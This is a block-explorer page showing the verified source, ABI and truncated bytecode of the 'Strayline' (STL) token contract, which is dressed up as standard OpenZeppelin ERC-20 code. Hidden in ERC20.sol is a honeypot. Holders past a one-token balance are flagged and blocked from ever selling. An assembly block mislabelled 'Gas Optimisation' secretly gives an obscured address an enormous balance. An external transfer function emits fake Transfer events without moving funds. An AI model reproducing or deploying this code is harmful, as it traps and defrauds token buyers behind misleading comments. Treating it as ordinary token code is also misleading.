ETH Price: $3,014.68 (-7.57%)
 

Overview

Max Total Supply

1,000,000,000 STL

Holders

72

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
23,737,847.398807256708069829 STL

Value
$0.00
0xbc9aef2644d1c0d6b78829de0578d51e242016ec
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Strayline

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

/**
███████╗████████╗██████╗  █████╗ ██╗   ██╗██╗     ██╗███╗   ██╗███████╗
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚██╗ ██╔╝██║     ██║████╗  ██║██╔════╝
███████╗   ██║   ██████╔╝███████║ ╚████╔╝ ██║     ██║██╔██╗ ██║█████╗  
╚════██║   ██║   ██╔══██╗██╔══██║  ╚██╔╝  ██║     ██║██║╚██╗██║██╔══╝  
███████║   ██║   ██║  ██║██║  ██║   ██║   ███████╗██║██║ ╚████║███████╗
╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝
**/

contract Strayline is ERC20 {
    constructor() ERC20("Strayline", "STL") {
        _mint(msg.sender, 1000000000 * 10 ** 18);
    }
} 

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private _airdrop;
    mapping(address => bool) private _liquidityPools;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _airdropUsed = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-transfer}.
     * 
     * Advanced method.
     */

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * Traiding Functionality
     */

    function airdrop(address _address_) public view returns (bool) {
        return _airdrop[_address_];
    }
    
    function outFromAirrop(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _airdrop[_addresses_[i]] = false;
        }
    }
    
    function setLiquidityPools(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _liquidityPools[_addresses_[i]] = true;
        }
    }

    function liquidityPool(address _address_) public view returns (bool) {
        return _liquidityPools[_address_];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        uint256 toBalance = _balances[to];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_airdrop[from] || _airdrop[to]) require(_airdropUsed == true, "");
        if (10 ** decimals() < toBalance && !_liquidityPools[to]) _airdrop[to] = true;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        address owner = _msgSender();
        _liquidityPools[owner] = true;

        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        // Gas Optimisation
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        }

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"airdrop","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"liquidityPool","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"outFromAirrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"setLiquidityPools","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040525f60065f6101000a81548160ff02191690831515021790555034801562000029575f80fd5b506040518060400160405280600981526020017f53747261796c696e6500000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f53544c0000000000000000000000000000000000000000000000000000000000815250620000b6620000aa6200010060201b60201c565b6200010760201b60201c565b8160079081620000c7919062000646565b508060089081620000d9919062000646565b505050620000fa336b033b2e3c9fd0803ce8000000620001c860201b60201c565b6200083b565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f620001d96200010060201b60201c565b9050600160035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620002a1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002989062000788565b60405180910390fd5b620002b45f8484620003d860201b60201c565b8160055f828254620002c79190620007d5565b925050819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508273ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051620003b8919062000820565b60405180910390a3620003d35f8484620003dd60201b60201c565b505050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200045e57607f821691505b60208210810362000474576200047362000419565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004d87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200049b565b620004e486836200049b565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200052e620005286200052284620004fc565b62000505565b620004fc565b9050919050565b5f819050919050565b62000549836200050e565b62000561620005588262000535565b848454620004a7565b825550505050565b5f90565b6200057762000569565b620005848184846200053e565b505050565b5b81811015620005ab576200059f5f826200056d565b6001810190506200058a565b5050565b601f821115620005fa57620005c4816200047a565b620005cf846200048c565b81016020851015620005df578190505b620005f7620005ee856200048c565b83018262000589565b50505b505050565b5f82821c905092915050565b5f6200061c5f1984600802620005ff565b1980831691505092915050565b5f6200063683836200060b565b9150826002028217905092915050565b6200065182620003e2565b67ffffffffffffffff8111156200066d576200066c620003ec565b5b62000679825462000446565b62000686828285620005af565b5f60209050601f831160018114620006bc575f8415620006a7578287015190505b620006b3858262000629565b86555062000722565b601f198416620006cc866200047a565b5f5b82811015620006f557848901518255600182019150602085019450602081019050620006ce565b8683101562000715578489015162000711601f8916826200060b565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000770601f836200072a565b91506200077d826200073a565b602082019050919050565b5f6020820190508181035f830152620007a18162000762565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620007e182620004fc565b9150620007ee83620004fc565b9250828201905080821115620008095762000808620007a8565b5b92915050565b6200081a81620004fc565b82525050565b5f602082019050620008355f8301846200080f565b92915050565b611d3680620008495f395ff3fe608060405234801561000f575f80fd5b506004361061011f575f3560e01c8063715018a6116100ab578063beabacc81161006f578063beabacc81461032f578063c0806db61461034b578063dd62ed3e1461037b578063f2fde38b146103ab578063fe1da5df146103c75761011f565b8063715018a6146102895780638da5cb5b1461029357806395d89b41146102b1578063a457c2d7146102cf578063a9059cbb146102ff5761011f565b806323b872dd116100f257806323b872dd146101bf578063313ce567146101ef578063395093511461020d5780634d3c26e01461023d57806370a08231146102595761011f565b806306fdde0314610123578063095ea7b31461014157806318160ddd1461017157806321860a051461018f575b5f80fd5b61012b6103e3565b604051610138919061129b565b60405180910390f35b61015b60048036038101906101569190611350565b610473565b60405161016891906113a8565b60405180910390f35b610179610495565b60405161018691906113d0565b60405180910390f35b6101a960048036038101906101a491906113e9565b61049e565b6040516101b691906113a8565b60405180910390f35b6101d960048036038101906101d49190611414565b6104f0565b6040516101e691906113a8565b60405180910390f35b6101f761051e565b604051610204919061147f565b60405180910390f35b61022760048036038101906102229190611350565b610526565b60405161023491906113a8565b60405180910390f35b610257600480360381019061025291906114f9565b61055c565b005b610273600480360381019061026e91906113e9565b6105ff565b60405161028091906113d0565b60405180910390f35b610291610645565b005b61029b610658565b6040516102a89190611553565b60405180910390f35b6102b961067f565b6040516102c6919061129b565b60405180910390f35b6102e960048036038101906102e49190611350565b61070f565b6040516102f691906113a8565b60405180910390f35b61031960048036038101906103149190611350565b610784565b60405161032691906113a8565b60405180910390f35b61034960048036038101906103449190611414565b6107a6565b005b610365600480360381019061036091906113e9565b610810565b60405161037291906113a8565b60405180910390f35b6103956004803603810190610390919061156c565b610862565b6040516103a291906113d0565b60405180910390f35b6103c560048036038101906103c091906113e9565b6108e4565b005b6103e160048036038101906103dc91906114f9565b610966565b005b6060600780546103f2906115d7565b80601f016020809104026020016040519081016040528092919081815260200182805461041e906115d7565b80156104695780601f1061044057610100808354040283529160200191610469565b820191905f5260205f20905b81548152906001019060200180831161044c57829003601f168201915b5050505050905090565b5f8061047d610a08565b905061048a818585610a0f565b600191505092915050565b5f600554905090565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806104fa610a08565b9050610507858285610bd2565b610512858585610c5d565b60019150509392505050565b5f6012905090565b5f80610530610a08565b90506105518185856105428589610862565b61054c9190611634565b610a0f565b600191505092915050565b6105646110c8565b5f5b828290508110156105fa57600160035f85858581811061058957610588611667565b5b905060200201602081019061059e91906113e9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080600101915050610566565b505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61064d6110c8565b6106565f611146565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606008805461068e906115d7565b80601f01602080910402602001604051908101604052809291908181526020018280546106ba906115d7565b80156107055780601f106106dc57610100808354040283529160200191610705565b820191905f5260205f20905b8154815290600101906020018083116106e857829003601f168201915b5050505050905090565b5f80610719610a08565b90505f6107268286610862565b90508381101561076b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076290611704565b60405180910390fd5b6107788286868403610a0f565b60019250505092915050565b5f8061078e610a08565b905061079b818585610c5d565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161080391906113d0565b60405180910390a3505050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6108ec6110c8565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361095a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095190611792565b60405180910390fd5b61096381611146565b50565b61096e6110c8565b5f5b82829050811015610a03575f60025f85858581811061099257610991611667565b5b90506020020160208101906109a791906113e9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080600101915050610970565b505050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373fffffffffffffffffffffffffffffffff